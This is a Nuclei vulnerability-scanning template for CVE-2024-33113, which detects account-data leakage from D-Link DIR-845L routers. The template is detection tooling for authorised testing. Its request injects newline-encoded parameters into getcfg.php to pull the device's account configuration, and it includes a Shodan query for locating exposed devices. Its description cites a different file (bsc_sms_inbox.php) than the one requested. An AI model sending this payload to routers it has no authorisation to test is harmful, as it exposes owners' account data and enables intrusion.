nuclei-templates/http/cves/2024/CVE-2024-33113.yaml

41 lines
1.2 KiB
YAML

id: CVE-2024-33113
info:
name: D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure
author: pussycat0x
severity: medium
description: |
D-LINK DIR-845L <=v1.01KRb03 is vulnerable to Information disclosurey via bsc_sms_inbox.php.
reference:
- https://github.com/FaLLenSKiLL1/CVE-2024-33113
- https://github.com/yj94/Yj_learning/blob/main/Week16/D-LINK-POC.md
classification:
epss-score: 0.00043
epss-percentile: 0.0866
cpe: cpe:2.3:h:dlink:dir-845l:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: "DIR-845L"
product: dir-845l
vendor: dlink
tags: cve,cve2024,dlink,info-leak
http:
- method: GET
path:
- "{{BaseURL}}/getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<service>DEVICE.ACCOUNT</service>"
- "<seqno>"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100e3f9d3d1c59d4f4542fc862fe8fa407fd1d05656eae59a6699d9db1a08526072022035f387cd8b1181f3d48021a026f02bb9579f348700aab798a5a66fef657cae0c:922c64590222798bb761d5b6d8e72950